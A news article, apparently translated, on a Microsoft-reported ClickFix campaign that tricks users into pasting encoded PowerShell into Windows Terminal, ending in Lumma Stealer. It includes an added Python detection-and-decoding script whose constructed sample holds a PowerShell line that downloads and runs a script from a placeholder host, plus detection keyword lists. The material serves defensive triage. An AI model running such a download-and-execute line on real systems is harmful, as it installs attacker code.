Users start malware: ClickFix attack campaign relies on Windows Terminal
In ClickFix attacks, victims are supposed to execute commands themselves to infect their systems. One campaign relies on Windows Terminal.
(Image: Skorzewiak/Shutterstock.com)
Microsoft warns of a ClickFix campaign observed in February 2026. It relies on potential victims executing malicious commands in the Windows Terminal.
Microsoft's Threat Intelligence team reported this on Bluesky. According to the team, it is a widespread ClickFix campaign that in February 2026 switched to launching Windows Terminal instead of the usual sequence of opening the Run dialog with the Windows key + "R", pasting the malicious command, and executing it.
Malicious Code in Windows Terminal
In the campaign, attackers instruct potential victims to press the Windows key + "X" shortcut and then select "I" from the menu that appears. This opens Windows Terminal (though, contrary to Microsoft's description, not the elevated version with administrator rights, which at least on German Windows systems is reached with the "A" key). Windows Terminal opens a PowerShell session, an environment that is typically used for administrative tasks.
This approach bypasses detections written specifically for abuse of the "Run" dialog, while exploiting the familiar look of Windows Terminal. Once the terminal is open, attackers instruct victims to execute malicious PowerShell commands. They deliver these commands via fake CAPTCHA pages, alleged troubleshooting prompts, and lures that resemble common verification mechanisms. Commands pasted into an interactive PowerShell session still leave traces, however: PSReadLine writes them to ConsoleHost_history.txt in the user's profile, and PowerShell script block logging (event ID 4104), where enabled, records what actually ran, so detection can shift from the Run dialog's RunMRU registry key to those sources.
The initial command is hex-encoded and "XOR-compressed," Microsoft's researchers explain. It spawns further PowerShell processes, which decode the embedded hex commands. These download a legitimate, renamed 7-Zip binary that unpacks and starts a multi-stage attack chain. This includes additional executable files, scheduled tasks, exclusions for Microsoft Defender, and finally exfiltration of stolen machine and network information. Ultimately, the attack culminates in the installation of Lumma Stealer, which hooks into processes such as the Chrome and Edge browsers, searches for web and login data as well as stored credentials, and sends them to the attackers' servers. A second variant uses the "EtherHiding" technique, in which a blockchain serves as the command-and-control channel and helps obfuscate the attack.
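The following is an added triage example, not code from the article or from Microsoft's post. It shows how an analyst could flag process-creation records for the pattern described above (PowerShell spawned from an interactive terminal session with a long hex blob on the command line) and then peel the hex-plus-XOR layers to recover the inner stages. Everything in it is an assumption standing in for the real campaign: the records are constructed in the style of Sysmon Event ID 1 fields, the encoding is a single-byte XOR followed by hex (the campaign's actual scheme is not published on this page), the marker keywords used to pick the XOR key are a guess, and the parent-process set reflects the fact that a Win+X/I launch puts the pasted command under WindowsTerminal.exe or its PowerShell child rather than under explorer.exe as the Win+R path does.

```python
import re
from typing import Optional

# Constructed sample stages (not real campaign payloads). example.invalid is a reserved name.
FINAL_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
HEX_BLOB = re.compile(r"[0-9A-Fa-f]{40,}")
# Substrings whose presence makes a decoded layer look like a real PowerShell stage (assumption).
MARKERS = ("powershell", "iex", "invoke-", "http", "7z", "schtasks", "mppreference", "-enc")
# Parents expected for a command pasted into a Win+X/I terminal session (assumption);
# the Run-dialog variant would instead show explorer.exe as the parent.
INTERACTIVE_PARENTS = ("windowsterminal.exe", "powershell.exe", "pwsh.exe")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def encode_layer(plain: str, key: int) -> str:
    """Constructed encoder: XOR every byte with a single-byte key, then hex-encode."""
    return xor_bytes(plain.encode(), key).hex()


# Build the two-layer sample: the outer command carries STAGE1, which carries FINAL_STAGE.
STAGE1 = f"powershell -nop -w hidden -c \"$x='{encode_layer(FINAL_STAGE, 0x5A)}'\""
OUTER_CMD = f"powershell.exe -NoProfile -Command \"$h='{encode_layer(STAGE1, 0x21)}'\""

# Constructed process-creation records; the second is a benign command containing a SHA-256.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": OUTER_CMD},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe",
     "CommandLine": "powershell.exe -Command \"Get-FileHash tool.zip | Where-Object Hash -eq "
                    "'E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855'\""},
]


def score(candidate: bytes) -> int:
    """-1 if any byte is non-printable, otherwise 1 plus the number of marker hits."""
    if any(b < 9 or 13 < b < 32 or b > 126 for b in candidate):
        return -1
    text = candidate.decode("ascii").lower()
    return 1 + sum(text.count(m) for m in MARKERS)


def decode_blob(blob: str) -> Optional[str]:
    """Try all 256 single-byte keys; accept only a printable result with at least one marker."""
    if len(blob) % 2:
        return None
    raw = bytes.fromhex(blob)
    best_key = max(range(256), key=lambda k: score(xor_bytes(raw, k)))
    out = xor_bytes(raw, best_key)
    return out.decode() if score(out) > 1 else None


def peel(command_line: str, max_depth: int = 5) -> list:
    """Decode the hex blob in a command, then repeat on the result until nothing decodes."""
    stages, current = [], command_line
    for _ in range(max_depth):
        match = HEX_BLOB.search(current)
        if not match:
            break
        decoded = decode_blob(match.group(0))
        if decoded is None:
            break
        stages.append(decoded)
        current = decoded
    return stages


def is_suspicious(event: dict) -> bool:
    """First-pass filter: PowerShell under an interactive terminal parent with a long hex blob."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    return (parent.endswith(INTERACTIVE_PARENTS)
            and image.endswith(("powershell.exe", "pwsh.exe"))
            and HEX_BLOB.search(event.get("CommandLine", "")) is not None)


def triage(events: list) -> list:
    """Confirm first-pass hits by decoding; a hex string that yields nothing is dropped."""
    hits = []
    for event in events:
        if not is_suspicious(event):
            continue
        stages = peel(event["CommandLine"])
        if stages:
            hits.append({"CommandLine": event["CommandLine"], "Stages": stages})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        for depth, stage in enumerate(hit["Stages"], 1):
            print(f"stage {depth}: {stage}")
```

The decode step is what keeps the rule from firing on every command line that happens to contain a hash: the benign Get-FileHash record passes the first filter but no XOR key turns its SHA-256 into printable PowerShell, so it is discarded. In a real deployment the parent-process check and marker list would be tuned against the tenant's own baseline.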
In mid-February, Microsoft's IT security researchers observed a ClickFix variant in which attackers relied on DNS responses. In these responses to internet name resolution requests, they hid the malicious code that leads to the installation of malware.
(dmk)